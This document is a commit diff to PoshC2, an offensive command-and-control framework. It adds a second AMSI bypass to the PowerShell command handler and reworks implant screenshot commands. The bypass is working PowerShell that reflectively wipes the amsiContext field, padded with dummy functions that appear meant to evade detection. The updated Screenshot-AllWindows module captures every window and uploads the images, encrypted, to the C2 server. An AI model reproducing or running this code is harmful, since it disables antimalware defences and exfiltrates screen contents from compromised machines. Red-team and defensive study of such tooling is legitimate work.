Updated get-screenshot & get-screenshot-allwindows PS command handler

Updated amsi bypass
Fixed screenshot-allwindows
Multi-Screenshot Typo

Author: benpturner

poshc2/client/command_handlers/PSHandler.py

@@ -107,14 +107,14 @@ def get_commands():
 
 
 @command(commands, commands_help, examples, block_help)
-def do_disable_amsi(user, command, implant_id):
+def do_disable_amsi_1(user, command, implant_id):
     """
     Disables / wipes the amsiContext
 
     ref: https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/av-edr-evasion/amsi-bypass
 
     Examples:
-        disable-amsi
+        disable-amsi-1
     """
 
     command = """
@@ -138,6 +138,91 @@ def do_disable_amsi(user, command, implant_id):
     insert_object(new_task)
 
 
+@command(commands, commands_help, examples, block_help)
+def do_disable_amsi_2(user, command, implant_id):
+    """
+    Disables / wipes the amsiContext
+
+    ref: https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/av-edr-evasion/amsi-bypass
+
+    Examples:
+        disable-amsi-2
+    """
+
+    command = """
+# Dummy function to simulate some unrelated logic
+function Test-DummyFunction {
+    Write-Output "Starting dummy function..."
+    $x = 10
+    $y = 20
+    $z = $x + $y
+    Write-Output "The sum of $x and $y is $z"
+}
+
+# Another dummy function
+function Another-DummyFunction {
+    Write-Output "Running another dummy function..."
+    $a = "Hello"
+    $b = "World"
+    $c = "$a, $b!"
+    Write-Output $c
+}
+
+# Main script begins
+Write-Output "Initializing the main script..."
+Test-DummyFunction
+Another-DummyFunction
+
+# Reflective assembly analysis
+$a = [Ref].Assembly.GetTypes()
+ForEach($b in $a) {
+    if ($b.Name -like "*iUtils") {
+        $c = $b
+        Write-Output "Found matching type: $($b.Name)"
+    }
+}
+
+# Retrieve specific fields
+$d = $c.GetFields('NonPublic,Static')
+ForEach($e in $d) {
+    if ($e.Name -like "*Context") {
+        $f = $e
+        Write-Output "Found matching field: $($e.Name)"
+    }
+}
+
+# Manipulate field value
+$g = $f.GetValue($null)
+[IntPtr]$ptr = $g
+[Int32[]]$buf = @(0)
+Write-Output "Preparing to copy buffer to memory..."
+[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
+Write-Output "Buffer copied to memory."
+
+# Additional dummy logic
+function Final-DummyFunction {
+    Write-Output "Executing final dummy function..."
+    $numbers = 1..5
+    foreach ($num in $numbers) {
+        Write-Output "Number: $num"
+    }
+}
+
+# Main script ends
+Final-DummyFunction
+Write-Output "Script execution completed."
+"""
+
+    new_task = NewTask(
+        implant_id=implant_id,
+        command=command,
+        user=user,
+        child_implant_id=None
+    )
+
+    insert_object(new_task)
+
+
 @command(commands, commands_help, examples, block_help)
 def do_install_servicelevel_persistence(user, command, implant_id):
     """
@@ -1074,7 +1159,7 @@ def do_get_multi_screenshot(user, command, implant_id):
     Gets multiple screenshots over a defined period, one screenshot per beacon.
 
     Examples:
-        get-multi-screenshot 2m
+        get-multi-screenshot -timedelay 10 -quantity 30
     """
     pwrStatus = get_power_status(implant_id)
 
@@ -1112,6 +1197,32 @@ def do_stop_multi_screenshot(user, command, implant_id):
     insert_object(new_task)
 
 
+@command(commands, commands_help, examples, block_help)
+def do_get_screenshot_allwindows(user, command, implant_id):
+    """
+    Gets a screenshot of all windows on the the current desktop.
+
+    Examples:
+        get-screenshot-allwindows
+    """
+    pwrStatus = get_power_status(implant_id)
+
+    if pwrStatus is not None and pwrStatus.screen_locked:
+        ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
+
+        if ri.lower() == "n" or ri.lower() == "":
+            return
+
+    new_task = NewTask(
+        implant_id=implant_id,
+        command=command,
+        user=user,
+        child_implant_id=None
+    )
+
+    insert_object(new_task)
+
+
 @command(commands, commands_help, examples, block_help)
 def do_get_screenshot(user, command, implant_id):
     """

poshc2/server/AutoLoads.py

@@ -72,8 +72,10 @@ def run_powershell_autoloads(command, implant_id, user, load_module_command="loa
         check_module_loaded("Exploit-EternalBlue.ps1", implant_id, user, load_module_command=load_module_command)
     elif command.startswith("ps"):
         check_module_loaded("Get-ProcessList.ps1", implant_id, user, load_module_command=load_module_command)        
-    elif command.startswith("get-screenshotallwindows"):
-        check_module_loaded("Get-ScreenshotAllWindows.ps1", implant_id, user, load_module_command=load_module_command)
+    elif command.startswith("get-multi-screenshot"):
+        check_module_loaded("Screenshot.ps1", implant_id, user, load_module_command=load_module_command)
+    elif command.startswith("get-screenshot-allwindows"):
+        check_module_loaded("Screenshot-AllWindows.ps1", implant_id, user, load_module_command=load_module_command)
     elif command.startswith("invoke-psuacme"):
         check_module_loaded("Invoke-PsUACme.ps1", implant_id, user, load_module_command=load_module_command)
     elif command.startswith("invoke-bloodhound"):
@@ -293,7 +295,8 @@ def run_powershell_autoloads(command, implant_id, user, load_module_command="loa
         check_module_loaded("Invoke-URLCheck.ps1", implant_id, user, load_module_command=load_module_command)
     elif command.startswith("get-injectedthread"):
         check_module_loaded("Get-InjectedThread.ps1", implant_id, user, load_module_command=load_module_command)
-
+    elif command.startswith("get-screenshot"):
+        check_module_loaded("Screenshot.ps1", implant_id, user, load_module_command=load_module_command)
 
 def run_sharp_autoloads(command, implant_id, user, load_module_command="load-module"):
     command = command.lower().strip()

poshc2/server/Tasks.py

@@ -194,6 +194,7 @@ def save_task_output(uri_path, encrypted_session_cookie, post_data):
                                 "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
                     print(
                         "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
+                    print(parsed_output)
             elif executed_command.lower().startswith("run-exe quickdraw"):
                 if parsed_output.startswith("[-]"):
                     update_task(task_id, parsed_output)

…ces/modules/Get-ScreenshotAllWindows.ps1 …ources/modules/Screenshot-AllWindows.ps1resources/modules/Get-ScreenshotAllWindows.ps1 renamed to resources/modules/Screenshot-AllWindows.ps1 resources/modules/Get-ScreenshotAllWindows.ps1 renamed to resources/modules/Screenshot-AllWindows.ps1

@@ -1,4 +1,4 @@
-function Get-ScreenshotAllWindows {
+function Get-Screenshot-AllWindows {
 
     param(
         [string] $TaskId
@@ -11,21 +11,22 @@ function Get-ScreenshotAllWindows {
         $assembly = [System.Reflection.Assembly]::Load($dllbytes)
     }
 
-	$processes = Get-Process
-	foreach ($p in $processes)
-	{
-		try {
-		   	[IntPtr] $windowHandle = $p.MainWindowHandle;
-			$msimage = New-Object IO.MemoryStream
+    $processes = Get-Process
+    foreach ($p in $processes)
+    {
+        try {
+            [IntPtr] $windowHandle = $p.MainWindowHandle;
+            $msimage = New-Object IO.MemoryStream
             $bitmap = [WindowStation]::Capture($windowHandle);
-			$bitmap.save($msimage, "png")
-            $b64 = [Convert]::ToBase64String($msimage.toarray())
+            $bitmap.save($msimage, "png")
+            $Output = [Convert]::ToBase64String($msimage.toarray())
             $bitmap.Dispose();
+            $Output = Encrypt-CompressedString $key $Output
+            $UploadBytes = getimgdata $Output
             $eid = Encrypt-String $key $TaskId
-            $send = Encrypt-String2 $key $b64
-            $UploadBytes = getimgdata $send
             (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null
-		} catch {}
-	}
+
+        } catch {}
+    }
     $error.clear()
-}
+}

resources/modules/Get-Screenshot.ps1 resources/modules/Screenshot.ps1resources/modules/Get-Screenshot.ps1 renamed to resources/modules/Screenshot.ps1

@@ -328,7 +328,7 @@ Function Test-ADCredential
 	$object.IsValid = $pc.ValidateCredentials($username, $password).ToString();
 	return $object
 }
-Function Get-MultiScreenshot {
+Function Get-Multi-Screenshot {
     param($Timedelay, $Quantity, [string] $TaskId)
 
     if ($Quantity -and $Timedelay) {

resources/modules/Stage2-Core.ps1

@@ -223,7 +223,7 @@ while($true)
                                   $Output = "ErrorLoadMod: " + $error[0]
                               }
                               Send-Response $Server $key $id $Output
-                          } elseif ($i.ToLower().StartsWith("get-screenshotallwindows")) {
+                          } elseif ($i.ToLower().StartsWith("get-screenshot-allwindows")) {
                               try {
                                   $i = $i + " -taskid " + $id
                                   Invoke-Expression $i | Out-Null
@@ -241,7 +241,7 @@ while($true)
                                   $Output = "ErrorGetWebpage: " + $error[0]
                                   Send-Response $Server $key $id $Output
                               }
-                          } elseif ($i.ToLower().StartsWith("get-screenshotmulti")) {
+                          } elseif ($i.ToLower().StartsWith("get-multi-screenshot")) {
                               try {
                                   $i = $i + " -taskid " + $id
                                   Invoke-Expression $i | Out-Null